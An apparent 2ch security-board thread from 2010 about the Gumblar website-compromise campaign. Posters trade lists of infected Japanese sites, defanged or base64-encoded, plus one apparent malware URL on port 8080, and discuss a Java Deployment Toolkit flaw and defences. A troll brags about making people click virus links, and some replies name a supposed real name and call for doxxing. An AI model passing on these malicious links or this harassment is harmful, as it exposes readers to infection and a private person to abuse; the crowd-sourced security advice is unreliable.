www●amakusaturigu●com
hrhr●sakura●ne●jp ←ブログ?
>>700 それはいつも思う、どうしてだろうね?
650のままだった事と、
>>636 で未来の自分に安価打ってた事に
今頃気が付いたw
名無しさんに戻りますね
加速度的に被害広がってるのに、話題的にはどんどん静まってきてるのはなんでだろう 現実逃避?
>>705 前にHP作成会社に聞いた話で
複数のHPを管理していて改竄されたのが一つだけ
自動更新するソフトを使ってるHPだけが改竄されたとか
IPAと警察庁に報告する様お願いしたけど
んで、今日同じ様な話しを聞いて思い出したw
>>703 対策や予防方法が広く認知されるようになったからだろう。
わかっていても検証コスト等の理由で後手に回っているサーバの改ざんは広がっていても
閲覧するだけの個人ユーザに被害が及ばなくなれば話題としては収束するさ。
>>700 npo-aichiはサイト内全滅でござる
/content/include/xoops●js
/content/modules/xhld0/phpdate●js
/content/modules/xhld1/phpdate●js
/content/modules/xhld2/phpdate●js
/content/modules/xhld3/phpdate●js
jsも全滅w
これはひどいwww
報告アドレスが結構悪用されてるな 感染を広げる一因にもなってるんじゃねw
報告アドレスを難読化させればよいんじゃね?
>>713 こゆのはどないだ?(苦笑
687474703a2f2f7777772e6a632d636f6e73756c74696e672e6a702f
687474703a2f2f7777772e616d616b7573617475726967752e636f6d2f68746d6c2f0d0a
687474703a2f2f7777772e6e69617566756b752e636f6d2f696e6465782e68746d0d0a
この程度でいいんじゃね? aHR0cDovL3d3dy5leGFtcGxlLmNvbS8K aHR0cDovL3d3dy4yY2gubmV0Lwo= aHR0cDovL3BjMTEuMmNoLm5ldC90ZXN0L3JlYWQuY2dpL3NlYy8xMjY4MDU5Njg0Lwo=
javaに0dayだってさ。
d3d3LnNha2lrby5qcA== こうすれば良いんだな?
\x68\x74\x74\x70\x3a\x2f\x2f の時は捜しやすかったんだが・・・
発掘されやすいから %68%74%74%70%3a%2f%2f こうしたのかな?
↓
ttp://search ●yahoo●co●jp/search?p=%22%5Cx68%5Cx74%5Cx74%5Cx70%5Cx3a%5Cx2f%5Cx2f%22&search.x=1&fr=top_ga1_sa&tid=top_ga1_sa&ei=UTF-8&aq=&oq=
aHR0cDovL3d3dy5hZ3VzZS5qcC8/bT13JnVybD1odHRwJTNBJTJGJTJGd3d3LmRhaW5pLXN1cnZleS5jb20lMkYmeD00NiZ5PTQ= ここって1回閉鎖したんじゃなかった?
www●bandoolshien●com nodさんが反応しました
難読化云々よりここに晒す前に凸ってればいいのでは?
凸だけじゃどうせスルーされるか隠蔽されるだけだから公表すべきだけど みんなに知らせるって意味じゃ難読化してちゃ意味ないんだよな
まあ2chに貼られたURL無用心に踏む奴もなあ 俺は2chに貼ってあるURLは全てgredとaguseでチェックしてるけど
そこらへんはひっかかるほうも悪いよな グロでもウイルスでも2chじゃ無用心に踏む方も悪い グロ踏んで学習するかウイルス踏んで学習するかの違いだろう 貼るバカを肯定するわけじゃないけどな
張るバカよりも踏むバカのほうが悪いって感覚が蔓延してる限り悪用はなくならんよ 不特定多数の人間がいる場所では常に用心はすべきだというのは紛れもない事実だけどね
URL貼られることの多いスレとかはテンプレに ※貼られたURLが安全だということは保障できません 踏む前に必ずブラクラチェック等行いましょう※ くらい入れてもいい気はする
ドライビングバイダウンロード攻撃突撃ィ!
どこへドライブ行くんだよ
不利な対策ソフトを使っている人は不幸だねぇ
733 :
オルティス・ジャパン :2010/04/12(月) 22:02:43
www●collco●jp/
コルコの方、こっそり修正している様ですが
告知はまだですか?
先程は検討をしてると言っていましたね
未だに告知をしていない様ですが…
それとね、貴方達は修正したつもりなのでしょうけど
リダイレクターはまだ残っているのです
改竄は完全には修正されてはいないのです
他の方からメールで教えて貰った事を全て完全に実行しなさい
>>584 を心に刻み、心を入れ替えなさい
真摯な姿勢こそが大切だとは思わないのですか
情報処理推進機構:情報セキュリティ:ウイルス・不正アクセス届出状況について(3月分および第1四半期)
http://www.ipa.go.jp/security/txt/2010/04outline.html > ウェブサイトの公開を再開する場合、必ずウェブサイト利用者への改ざんの事実の告知も掲載してください。
> ウェブサイト再開の際には、判明した範囲で、次に示す情報を告知することを勧めます。
> ・ 改ざんの事実の説明
> ・ 改ざんされていた箇所
> ・ 改ざんされていた期間
> ・ ウェブサイト利用者が改ざんされていた箇所を閲覧した場合に想定される被害(ウイルス感染など)の説明
> ・ ウイルスのチェック方法の説明(必要に応じてオンラインスキャンサイトの紹介など)
> ・ 問い合わせ用窓口の連絡先
>>733 それについてはエヌピーオー愛知ネットも気になるね
昨日、NPO-AICHIの登録担当と技術担当、倉敷CATVの技術担当のメアドに
aguseの調査結果を送ってさしあげたら何の説明もなしに閉鎖してたさ
"災害時の確実な情報伝達を目的とするNPO法人"とか何のジョークだよw
>>736 役に立たない鳩耳に密告しておくか・・・・
>>736 イ牛のNPOからスクリプトは除去したってメルきたお。
その時点ではスクリプトはなくなってた。
IPAに被害報告してってことと
>>735 のこと書いて返信したら403になった。
思案中かも。
>>738 おやそうでしたか、それは失礼しました…
JAVA Web Startの0-day対策は javaws.exeをHIPS等で無効化 Firefoxだったら、Java Deployment Toolkitプラグインを無効化 とかでいいのかな? どうも情報が少なくてよくわからない。
>>736 倉敷CATVも感染してたのか・・・実家の地元局でケーブル引いてるだけになんか凄い残念だな
>>740 指摘されないとわからないバカの集団らしいなw
/inquiry
<!--トロイを絶賛配布中!(無料)-->
↑追記しておけwwwww
>>743 whoisかaguse見れ
魚青 211.125.125.234の管理
746 :
741 :2010/04/13(火) 04:22:51
>>745 どゆことなの?出されたIPを調べたらnpo-aichi.or.jpって出たが
npo-aichiの登録・技術担当と倉敷CATVの技術担当が同じって事?
もしその通りって事だと倉敷CATVは今感染してなくとも危ないって事?
>>746 Operaでプラグイン入れてないと読み込みが完了しないかんじ。
>>747 大家と店子の関係
749 :
名無しさん@お腹いっぱい。 :2010/04/13(火) 06:41:42
マスターペニス
750 :
名無しさん@お腹いっぱい。 :2010/04/13(火) 06:55:32
ドライビングバイ海老名SAダウンロード
a2FkYXJ1Lm15ZG5zLnRvLw== ←再発 d3d3LmFtYWt1c2F0dXJpZ3UuY29tLw0K ---- 6Zml6JC944K144Kk44OI44GuVVJM44KS6YGK44Gz44O744GE44Gf44Ga44KJ55uu55qE44Gn6LK84 4KL44GK44OQ44Kr44GV44KT44Gv44CB6ISz44G/44Gd44Gu44Kv44Oq44O844Oz44Kk44Oz44K544 OI44O844OrKOWGjeaVmeiCsinjgYzlv4XopoHjgaDjgajmgJ3jgo/jgozjgb7jgII= ・・・ということですw
753 :
名無しさん@お腹いっぱい。 :2010/04/13(火) 13:33:40
>>740 77y8KF5vXinvvI/jgqrjg6/jgr8=
ばーか
確信犯死ねよ
aHR0cDovL2Jvby4yY2gubmV0L2JvbzIwMDguY2dpP3R5cGU9cmVkJmJvbzIwMDhfdXJpPWh0dHAl
M0ElMkYlMkZwYzExLjJjaC5uZXQlMkZ0ZXN0JTJGcmVhZC5jZ2klMkZzZWMlMkYxMjY4MDU5Njg0
JTJGNzU0JmJvbzIwMDhfdGltZT0yMDEwJTJGMDQlMkYxMyUyOCU4OSVDRSUyOSsxMyUzQTQzJTNB
NDMmYm9vMjAwOF9pZD0mYm9vMjAwOF9wb3J0PSZib28yMDA4X3RyaXA9
>>753 77y8KF5vXinvvI/jgqrjgr/jg68=
これじゃ、どこのサイトが危険なのか分からん
よかった、うちのサイトは晒されてないわ
コントロールパネル見てて思ったんだが、 J2SE runtime Environment 5.0 update6と Java(TM)6 update19が一緒に存在してるんだ これは更新の仕様がないJ2SEを消すべき?それとも両方とも置いておかないといけないモノ?
>>757 >串迎撃部隊@2ch掲示板 -- Boo2008 --
>Good bye 9000
>がいしゅつ!!Done ! -> [BBQ]None(^-^)
>名も無きBoo2008さん、ありがとうですm(_ _)m
>\(^o^)/オワタ
>>762 IGh0dHA6Ly9qYS53aWtpcGVkaWEub3JnL3dpa2kvJUUzJTgyJUFBJUUzJTgyJUJGJUUzJTgzJUFG
もうJava自体をアンインスコしたんだけど 無くて困ることってなにかある?
あなたが困らなければ無いし、困ればそれ
>>763 \(^o^)/オタワ
・・・・・・もうやめよう(苦笑)
おーはぴーでーい
>764
Javaに新たな問題が見つかる、多数のブラウザに影響の恐れ
ttp://www.itmedia.co.jp/enterprise/articles/1004/13/news072.html Java Deployment Toolkitに見つかった新たな問題
launch()メソッドからJava Web Startユーティリティ(javaws.exe)に任意の引数を渡すことができてしまうという
。攻撃者が悪用した場合、ユーザーが細工されたHTMLを閲覧してしまうことで
リモートから任意のJARファイルを実行されてしまう危険がある。
Java Deployment Toolkitは、Java SE 6 update 10以降をインストールした際に
同時にインストールされる。ブラウザのプラグインやActive-X コントロールとしても利用されるため
Microsoft Internet ExplorerやFirefox、Google ChromeなどWindowsベースの
多数のブラウザに影響が及ぶ可能性がある。
米Oracleの対応は未定。IPAとJPCERT コーディネーションセンターは
当面の回避策として、ActiveX コントロールやブラウザのJava Deployment Toolkitを
無効にすることを推奨している。
【陥落サイトのURL悪用厳禁】 www●tu-han4●com/hatumo/ www●daini-survey●com/ versamold●com/ 難読化はムダっぽい...
Adobe Readerアップデートきたな
>>772 またなんかありそうだから様子見。
てか、もう Foxit に乗り換えたし。
774 :
名無しさん@お腹いっぱい。 :2010/04/14(水) 12:37:10
コンパネ見たがJavaは最近更新したRuntimeしかなかった 上で述べられてるツールキットは最近の奴だとruntime内蔵なのかな? そうならどうやって無効化するのか…… ActiveXはインターネットオプションで無効化できるんだが
【陥落サイトのURL悪用厳禁】 ←まねしてみた www●sot●com●al VirusTotalでの検出結果は5/40(12.5%) Avast頑張るなぁ
avastは今は知らないが初期の頃はスクリプトの段階で処理しないと防御できなかったからな スクリプトに対応しなくても防御はできるが こういう風に特に初心者にアピールにはなるから一生懸命なのだろう
サブPCでavastを使ってるけど
>>770 の検体の全てに反応した。
メインPCでは某ベンダの有料版を使っているが
>>770 の検体の検出はまちまちだった。
ただ
>>754 のサイトでは全てに反応した。
avastはソース段階(スクリプト自体)で検出しているが、
某ベンダは実行段階で検出しているようだ。
そうか。よかったな。
そもそもソースの段階で何を検出してんだ
>>770 AVG Freeが9個しか反応しなかった・・・おぉコワイコワイ
avast5だけど、
>>770 で3つスルーされた・・・
なるほど、オレはもう掛かってるのか!
gumblerにも無害有害があるのか…… つか、最近の亜種だとcmdとregdit動くみたいだし、どういう症状が出るか解らんから 感染してるかどうかすらオンラインスキャン以外じゃわからんよな
>>783 3つとも解析済みで、検出したのはなかったそうだ
再解析してみたら1つだけ出てきた
Gumblar_js.txt
Sophos 4.52.0 2010.04.14 Troj/JSRedir-BD
【陥落サイトのURL悪用厳禁】 www●nittoka●com/ ←そーすの途中にコードが・・・ discussanctuary●com/からコードごと引っ越したのかな? www●1a●ad-jeaayf●com/ae/ s6●artemisweb●jp/djtsushin/naruto/part1/index●html ←改竄されてるってばよw※jword注意
788 1:きゅい〜ん 2:きゅい〜ん 3:403 4:きゅい〜ん 790 1:きゅい〜ん 2:きゅい〜ん 3:きゅい〜ん avast! 大勝利w
アバストは警告を発した!しかし、感染してしまった
KATINOが効かないと全滅するパーティーですか
>>2 (4) JRE(Java Runtime Environment)を最新版に更新する
これはAdobe Readerなんかと同じでWindowsをインストールしただけでは
JREはインストールされないよね?
JREをインストールしていなければ特に気にする必要はないんだよね?
PC初心者でちょっとよくわからないので教えてくれると助かります
初心者であればメーカー製PCを使用している可能性が高い メーカー製PCにはAdobeReaderもJREもプリインストールされていることがほとんど
コントロールパネルにJavaのアイコンがあればインストールされてる ちなみにそのアイコンをダブルクリックするとバージョン確認やアップデートもできる
>>795 WindowsをインストールしただけではJAVAは入らないよ
上の人が言うようにメーカー製PCを買った場合は入ってるかもしれない
でもWindowsのCDを使ってOSをインストールしただけではJAVAは入らない
JREはアンインスコor入れないで全然問題ないと思うけどね
君にとってはそうなんだろうが、それを言い出すと最後には「Windowsじゃなくても全然問題 ないと思うけどね」みたいな不毛な話になるから自重しろ。
>>689-740 「不正改ざんに関するお詫び」
Last-Modified: Wed, 14 Apr 2010 07:03:06 GMT : www.collco.jp/index.html
>>801 思うんだが、「不正改ざんされた」ってのは責任逃れだろ。
むしろ、ここのサイト覗いた奴のPC「不正改ざんした」のがこの会社だろうに。
>※本件による、お客様にお預かりしております個人情報の流出はございません。
お前のサイト覗いたせいでパスとか流出する話しないで、どうすんだよ
スレに出ているサイトにクリックしても2割くらいしか反応しない。 ちなみにカスペルスキー2010 これはザルなのか? 設定でオフになってるのかと思いきやそうでもないし
Java Deployment Toolkit 6.0.200.2 Java(TM) Platform SE 6 U20 6.0.200.2
>>805 反応しないとこは修正済みもあるんじゃね
*:8080/* をブロックでおkだよね? *の位置が分からん
他の普通のサイトも巻き添えにしていいなら
>>810 巻き添えにしたくないなら
*.ru:8080/*
>>812 最近は.atと.infoも侵食されてるからそれじゃダメ
うむ、8080ポートの先にコンテンツを置くページは巻き添えにされても仕方ないな。
特定のURLブロックしてる人ってどういうソフト使ってますか? PeerBlockとかあるみたいだけどこれ使えばいいのかな
>>810 ブラウザのJAVAScript切っとけ
>>810 例えば敵方が8090に変った時には8080ブロックは無意味
あたりめえだろ 先のこと考えたら無意味なことばかりだ 現状の防御としては意味があるのだからそれで良いに決まってる
>>817 んじゃどういうソフト使ってるんですかね
avast!5にはURLブロック付いてるようですが
ポート8080ブロックするだけならいろんなファイアウオールで可能だよ 大概のルーター内蔵のでも可能じゃないか
Proxomitron なら正規表現風味の細かい指定が出来る。 セキュ板覗くような人間ならデフォで入れてるソフトだと思ってたんだが違うのか。
違うだろうな
>>823 Proxomitron はよく知らないが
難読化されてるスクリプトも簡単にフィルタリングできるのか?
>>823 無料HPスペースの広告がウザかった時代に使ってたけど、今は使ってない。
>>825 自分でフィルター書かなきゃダメ、もしくは有志の人待ち
>>825 パターンが変わればその都度になるが、現行では一応対応できているけど。
最近は変化が無いからつまらん。
どのみちいらねえよ
Proxomitronの脆弱性放置中
>>822-823 ありがとうございます。
とりあえず手持ちのFWでリモートポート8080番をシャットアウトすればいいんですかね?
Javaは早急にu20にしないと危険だべな Deployment Toolkitの脆弱性が8080インジェクションで使われ始めてるらしいから
なんか、ここの被害報告のヒロまり方見てると、 ダウソ板のイカタコなんて、子供の遊びに見えてくるな
12月下旬から騒ぎ出した気がするけど 4月になっても収まらないね。
>>2 の対策しておけばウイルス対策ソフトはいらない?
いります
java19入ってる状態で20入れたら19がコントロールパネルから消えた
これは上書きされたって事でいいのかな
以前の17→19の時は上書きなんてしなかったから「ひょっとして19のプログラム残ってるんじゃないか」って不安
>>2 の対策してれば、あとはActiveXやJavaを自動実行したりしないようにすればおkかな
20でだいじょうぶなのかな
842 :
名無しさん@お腹いっぱい。 :2010/04/16(金) 21:42:01
2ch「三脚」検索でHTML/spoofing Genが・・・どうゆうこと?
>>840 xpでjava19から20に上書きしたらfireroxのプラグインに19と20の
Deployment ToolkitがあったのでJava20をアンインストール後に
再度20をインストールした。
そしたら19の姿が消えたので心配なら一度アンインストールをした
方がいいと思う。
>>843 それもそうだな……アンインスコして入れ直してみる
そういえば、ここの文字検索でgoogleがいくつかあるんだが、
ひょっとしてgoogle自体もう全て完全に感染してるのか?
PCが重くなってる様子もメモリ異常に食われてるって事もないんだが……
なんでDeployment Toolkitとか余計なもん入れた
過去のJavaデータとかはJavaRaで消してるなあ
>>845 どれのことを言ってるの?
URLを理解できていないってことならどっかで勉強してきてください
そもそもgoogle自体が感染してたらここで騒がれるとかそういうレベルじゃ収まらんだろ
>>849 ごめん、URLと検索ワード読み直して大体把握した
感染サイトを探した結果だったのね……
>>851 8080じゃないはず(8080はJS:Illredir)
GDataはavastエンジン使ってるから実質avastだけ検知
スレ違いか、すまない
仕込まれる位置とかがちょっと違うようだね 海外では3月下旬くらいから出てるのかな
>>853 すまないではすまないのだ!
(VДV)死ねっ!さぁ死ぬのだ低脳よ
さて朝の挨拶も済んだことだし ガンブラをガンプラスレにでも貼り貼りしてきますかのう( VдV) ( ´,дゝ`)フォッフォフォフォーwww
>>858 ようお前にこないだウイルス踏まされたもんじゃボケ!
お前の本名、斎藤智成だろ?住所もググったらあったから請求書送るから待っとけや!w
住所がわかるなら直接行けば? その方が話が早いだろ
なんか変な人いるけどなにこいつ
('д')うん、確かに変な人いるね 俺様にウィルス踏まされる時点で自己管理が悪いわけで、つまり踏む奴が悪いわけで これはもう暗黙の了解ならぬ暗黙の常識なわけで(>w<)変な人だなぁプクススススwwwwwwwwwwwwww (VдV)しかも請求書ってなにいってるんだ? もし俺様が踏ませたウィルスの影響で金銭的な損害を受けたのだとしたら それは・・・ (VДV)ざまあみろだぜ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
それより俺様、昨日うる星やつらの再放送見逃したから youtubeでその回見なきゃなんないんだ。 やっぱ80年代の神アニメはうる星やつらだよね。 (*VдV*)デヘヘヘヘヘヘヘベヘヘケヘヘヘヘヘヘヘヘヘヘケewwwwwwwwwwwwwwp
キチガイってどうしてキチガイなんだろう
そりゃーおまえキチガイだからだろ
既出かもだけどこの痕跡は何ですか? /?N=A /?M=D /?S=D /?D=D /?N=A
867 :
866 :2010/04/17(土) 09:57:32
補足、ログの痕跡です。
何回も言われてるけど一回感染するとルートキットとかで雲隠れしやがるようだから検出できるか怪しいし
ウイルス感染したPCでスキャンしても絶対安全と保障できないぞ
心当たりあるんなら素直にクリーンインスコしたほうが良いよ
>>2 完璧に実行してブラウザ常時仮想化とかしてて「俺がウイルス感染なんかするわけねーだろばーか!」なら自分を信じていいだろうが
>>868 言ってる事は解らなくもないがこのスレ全否定してるよな、4行目でスレ住人の卑下までやってるし
クリーンインスコなんてみんながみんなホイホイできるわけでもないだろうに
まあやる気があれば民事でも請求できるでしょ
>>866 アクセスログなら何か試そうとしたんじゃね
874 :
866 :2010/04/17(土) 13:58:06
>>873 ユーザーディレクトリでのアクセスで
このコマンド?じゃ何も出来ないと思うけど、何かに感染したPCからの痕跡なのか...
ただ、面白いのは、IP調べると日本のM$専用線からのアクセスで
こっそり調べると鯖では無く、クライアントPCっぽい。
>>870 >間接正犯とは、他人の行為を利用して自己の犯罪を実現する正犯のことである。
>共犯ではないというのが通説である。
<中略>
>正犯とは、犯罪実現の現実的危険性を有する行為を自ら行う者をいうが、
>「自ら」は規範的理解が可能(緩やかに解することが可能)とする。
>そのうえで、他人を道具として利用する場合は、規範的には「自らの手で」行ったといえ、
>利用者の行為には正犯としての実行行為性が認められるとされる。
8080作者と同じ罪になるって事で・・・
顔文字(糞コテ)オワタwwwwwwww
誰かVIPに燃料投下してこいよ。 奴らの調査力なら顔文字野郎の個人情報なんてすぐに割れるだろ。
よし、任せたぞ
そして「誰かがやるだろ」とみんな思ってるので 誰も投下しないのであった
だって板別規制されてるし
881 :
U.F.O ◆U.F.OnbYNA :2010/04/17(土) 18:32:17
なんだよあの糞コテおでん厨じゃなかったのかよ・・・
早く規制されてほしいな。
というか規制からやっと復活したがその間にこんなにガンブラーでてたんだな・・・
気 を つ け な け れ ば
>>880 つまりこの糞コテを訴える事も出来るわけか。
顔文字ざまぁwwwwwm9(^Д^)プギャーwwwww
犯人に告ぐ。今夜は震えて眠れ(キリッ
>>862 aHR0cDovL3d3dy5nb29nbGUuY28uanAvc2VhcmNoP2hsPWphJnE9JUU5JTgwJTlEJUUzJ
TgxJUEzJUUzJTgxJUE2JUUzJTgyJTg4JUUzJTgxJTk3KyVFOSVBMSU5NCVFNiU5NiU4Ny
VFNSVBRCU5NyZidG5HPSVFNiVBNCU5QyVFNyVCNCVBMiZscj0=
死語とか言うなよwww
5pep44GP5q2744Gta3Nn
顔文字息してるー?w
逮捕者が出ると聞いて
また無職か
`ヽ、
\
\
,,ヅ彡ニミ;;,, ヅ彡ニミ;;,, l
ィ<" , ‐ 、 ゙ミ、 ィ<" , ‐ 、 ゙ミ、 ゙i
ミミ、, ゝ_゚_,ノ,, イ :ミミ、, ゝ_゚_,ノ,, イ ゙i
゙'ヾ三≡彡'" ゙'ヾ三≡彡' i!
/ ヽ ,. -- 、 i!
>>862 しねよ
/ \ / __,>─ 、
/ ',/ ', / ヽ
! l l { |__
、 ,' 、 ,' } \ ,丿 ヽ
ヽ . _ .. ' ヽ . _ .. ' / 、 `┬----‐1 }
/ `¬| l ノヽ
/ 、 !_/l l / }
{ \ l / ,'
\ ´`ヽ.__,ノ / ノ
\ ヽ、\ __,ノ /
 ̄ ヽ、_ 〉 ,!、__/
>>875-890 VдV)ん?
ずいぶんと必死に自演連投をしているようだな
そんなに連続で書き込んでたらいくらIDでなくてもバレバレだぜ
そんなことにも気づけないほど悔しかったのだな( ´,дゝ`)からかった甲斐があるぜ
でも残念ながらその程度の煽りでは不合格
というより残念賞というべきか。
なぜなら5年前からウィルス踏ませ続けてぴんぴんしているのだからな
この事実を覆すことはできないよ(>w<)本当に残念だったな
どぉだ?またムカムカしてきたか?(笑)
(VДV)そうか!じゃあ死ねっ!!!!!!!!(爆)
(*VдV*)
(*VдV*)あーきっと今頃・・・ 俺様にウィルス踏まされた奴は 俺様がこうやってますます調子に乗り乗り♪してることにムカつきながら俺のこと見てるんだろなw これだからやめられないお(>w<)快っ感!!!!
80年代の神アニメは映画版のSF新世紀レンズマン 「愛するものを守れ」 ブルーレイで出してほしいな…
まだやってんのか斉藤w
斉藤ってだあれ? 斎藤ならまだしも斉藤とは?(笑) (VдV)これってまたまた俺様が一本とっちゃった感じ? つーわけで漢字読めない低脳は死ね!と止めを刺しておこう(VдV)vチェキラ
(VдV)! ウィルス踏ませて笑いながらポテチを食うっ! とかキラっぽくポテチ食ってるなう!ヽ(VдV)ノなうなうなのらーい
900 :
名無しさん@お腹いっぱい。 :2010/04/18(日) 06:43:35
901 :
名無しさん@お腹いっぱい。 :2010/04/18(日) 06:49:33
(VдV)=3ふぅ〜 今日も踏ませてたら時間を忘れちゃったおw夢のような時間だったお もしかして俺様って日本一ウィルス踏ませてるコテじゃね?ギネス入りも近い?>w< なんか最近調子が良い この調子でますます俺様のファンが増えそうだ ウィルス踏ませてるのはホント、ゲーム感覚だが 考えてみたらあまりブログには書いてないな〜って思った。 近々気が向いたらブログでそういうの書いてみるわ 昔ヤフチャでボイチャしてる奴にウィルス踏ませてふぁびょってる録音とかあるけど うpしたら需要あるかな?まーお楽しみに>w< さて、ドラゴンボールとワンピースまで寝るお (VдV)おやすみお前ら
関係ないけど、まだ生きてるチェッカーってあるのかな?
>>2 のどれも死んでるんだが…。
aguseとgredは普通に使えるぞ
gredのサイトをチェックするボタンがグレーアウトで使えなかったのが IE8のInPrivateフィルターがオンのままだったのに最近気がついた俺って
908 :
名無しさん@お腹いっぱい。 :2010/04/18(日) 08:33:07
最近の亜種だとどういう症状が出るかサッパリ情報が出てないから 感染してるのかどうかわからなくて怖いぜ…… オンラインスキャンは推奨だけで十分なんだよな?
909 :
名無しさん@お腹いっぱい。 :2010/04/18(日) 12:15:45
www●hd-cre●com
>>908 逆に人柱PCを用意してわざと感染すればメインPCが安全かどうかがわかるんじゃね?
最近のってなかなか感染しないな どうやったら感染するんだ? なんかちゃんと感染してないサイトも多いんじゃないか
http:// logsoku.com/thread/pc11.2ch.net/sec/1263822552/l50
↑はログ速の過去ログなんだが
これ踏んだらカスペがヒューリスティックで遮断した
しかしgredで「リンク先のページをチェック」のオプションを使用しないと安全だと言われる(リンク先のページのスキャンを行うと改ざんサイトを検出)し、
しかもこれ他でもないこのスレの過去ログだから誰かが直リンで貼った改ざんサイトのURLに反応してカスペが遮断しただけかね?
それともスレ住人が書いたスクリプトにでも反応したのか
>>2 はしてあるしjavascriptも無効でその上仮想ブラウザ使ってるんだがちょっと不安になったもんで・・・
実際のとこ感染するとどんな症状がでるの? 再起動すると立ち上がらなくなったりとか?
ルートキット仕込まれたらなんでも出来るから一概には言えないだろうな ぶっちゃけ何やるかはクラッカーの気分次第なんじゃないかな・・・
だからこそクリーンインストールが勧められるわけか
ルートキットってそんなに見つけ出すの難しいのか ルートキットに仕込まれたものも見つけ出せるようなのを開発したら ノーベル賞取れるくらい難しいの?
ノーベル賞にそういう分野の賞はない
>>918 見つけ出すのは知識があればそれなりに出来るが、
駆除するのは非常に難しい。
それはセキュリティのプロでもルートキットを発見すると即クリーンインストールするほどだ。
>>915 感染させる目的が「利用者を困らせること」じゃなくて
「自分たち(と顧客)がそのPCを自由に使えるようにすること」だから
あからさまな不具合を出すようなことはあんまりない
たまにミスって出ちゃうけどそういうのはすぐ修正される
自由に使って何をしたいかというと、フィッシング詐欺用のサイトを構築したり
スパムメールを送りまくったり、どっかの国の政府関連サイトを攻撃したり
要は犯罪のお手伝いをすることになります
それによってある日突然おまわりさんがおうちに来るかもしれません
>>918 BlackLight使え
といっても、ある種のルートキットは、それでも見つからんけどね。
糞ニーの仕込むルートキット発見した人も、
自分でデバッガ作ってそれで見つけたそうだし
923 :
U.F.O ◆U.F.OnbYNA :2010/04/18(日) 21:29:17
概出だったらスマソ
ガンブラー
ttp://www ●plci●net/egf/?s=shiseldoh
>>923 旧型のタイプ違いが混在
www●plci●net/以下の階層は全滅かな?
禿検索で"window;var" "unescape;var"やってみなー
unescape;this型を除外しても凄い数・・・orz
改ざん疑惑 60●37●110●200/
927 :
名無しさん@お腹いっぱい。 :2010/04/19(月) 11:05:43
こっちの改ざん疑惑はどうですか? wwwwwwwwwww.net/
>>547 > cashingalliance
昨日、有効なスクリプトの再改竄を確認、つーほー。
あちらの鯖缶から午前中に停止等の処置済みの連絡、確認すますた。
>>2 1 済
2 Foxit Reader使ってるので未導入
3 同上
4 済
5 済
6 済
FoxitやPDF-XChangeもJavaScript機能使える環境だから注意
んだんだ。 そういうおいらは Linux使いw
この機会にpdf滅びてくんないかな
>>930 安全第一ならFoxit Readerは避けた方がいい。
安全性よりも軽さの方が大事なら自己責任で使えばいいけど。
ごおgぇどきゅめんとびゅーあーでかいけつやで
会社や役所でのやりとりがpdfなので最早避けては通れない
>>939 変なスクリプトはあるけどウイルスじゃなくね?
>>940 ソース見たけど怪しすぎるだろ、そこ。
trendmicroのアンチウイルス落とすのに、そんなサイト行く必要無いだろ
そもそもスレの流れと関係なく唐突にURL貼ってるのは警戒していい
943 :
939 :2010/04/19(月) 23:10:32
>>942 それは・・俺が掘ってきた陥落サイトも含むのか?
【陥落サイトのURL悪用厳禁】とか
危ないとこは「←アクセス注意」とか書いてるんだが・・・
>>944 スレタイと合ってる分には問題ないだろ
バスターなんてどう考えても関係ない
>>945 では、スレタイ通りの陥落サイトを。
URLがアヤシイのは気のせいだ(たぶん)
【陥落サイトのURL悪用厳禁】
www●god-hand●org ←途中で切れてる
22ch●org/pocketsbs/
連投スマソ
【陥落サイトのURL悪用厳禁】
amyou●net/
↓たぶん全滅↓
ttp://www ●google●co●jp/search?hl=ja&source=hp&q=site%3Aamyou●net
70po●com/pocketsbs/
ttp://www ●google●co●jp/search?hl=ja&q=site%3A*%2Fpocketsbs%2F
絞り込み方法を模索ちう...
>>946 > god-hand
jsが ぁぅぁぅぁー
「写女」っていう着エロ系でそれなりにDVDシリーズ作ってる メーカーのサイトだが、ウィルス警告が出た。 とりあえず間違いかもしれないので注意喚起のためにスレ探し回ってここに書いてみたが、 どうですかね? 公式サイトなんでググればすぐ出るし。
ここは鑑定スレではございません
たぶん感染中だな
952 :
名無しさん@お腹いっぱい。 :2010/04/20(火) 01:44:24
"unescape;var" OR "window;var" OR "document;this" OR "document;var" "false;this" OR "false;var" -javascript -java 下手なワードもOR打ちゃ当たる的な何かorz
sage忘れた…
>>935 横から失礼。Foxitが純正リーダーに次ぐ危険性だとは思わなんだ。
ところで、代替リーダーどれかオススメしてくれないか?
【陥落サイトのURL悪用厳禁】
kagaden●com/haato ←途中切れ
www●shinsei-fukushi●net
www●0120110908●com/ ←ガル繋がり?
www●hd-cre●com/
↓たぶん全滅↓
ttp://www ●google●co●jp/search?hl=ja&q=site%3Ahd-cre●com%2F
誰か新スレ建ててくださいなのです...
>>954 勘違いしてはいけない。逆だ。
ことセキュリティに関しては、今のFoxit ReaderはAdobe Readerより下。
すっかり忘れられてるPDF-XChange Viewer・・・
>>955 > kagaden
index2.phpとindex3.phpが ぁぅぁぅぁー
次スレ逝ってみる。
962 :
961 :2010/04/21(水) 03:20:21
965 :
738 :2010/04/22(木) 01:36:58
>>708 Last-Modified: Wed, 21 Apr 2010 14:36:46 GMT : /content/index.htm
>NPO愛知ネットからのお詫びとお知らせ
(´・ω・`)ショボーン
>>965 理事長:天野竹行>
改竄されていた事を隠蔽せず、告知を行ってください。
【重要】NPO愛知ネットからのお詫びとお知らせ
◆当ホームページを管理しているパソコンがGumblar亜種に感染し、ホームページが改竄されておりました。
◆改竄されていた期間
○月○日○時○分〜●月●日●時●分
◆改竄されていたページ
◆該当期間に当ホームページを閲覧した方へ
セキュリティソフトで(以下略
オンラインスキャンで(以下略
↑こんな感じで。
マトモな対応ができないなら、ホームページを閉鎖してweb上から消滅してください。
どうせアホみたいにちっさいリンク貼るだけだろ
2ちゃんという危険リンク満載のサイトで 何でそんな偉そうなんだ
2ちゃんのリンクは安全さ! なんてったって人柱リンクチェッカーが山のようにいるからな!
970 :
名無しさん@お腹いっぱい。 :2010/04/22(木) 17:17:51
972 :
名無しさん@お腹いっぱい。 :2010/04/24(土) 08:11:29
ここつかわないの?
新スレ立てるのが早すぎたんだろうな 流れがあっちに行っちゃってどうしたものやら 【陥落サイトのURL悪用厳禁】 再改竄、放置プレイ、新規サイトのごった煮です 重複してたらスルーしてちょうだい "unescape;var" "new RegExp" -JAVA -JAVAScript pre21●jp www●sakiko●jp www●shinsei-fukushi●net www●marbell●jp www●ecos-kenya●jp
tp://yamisyoku.info/ これもかな? realshoponline.info:8080/worldofwarcraft-com/google.com/lemonde.fr.php
>>974 テンプレの書き方に従えないならアドレスは一切貼らない方がいい
埋めるか
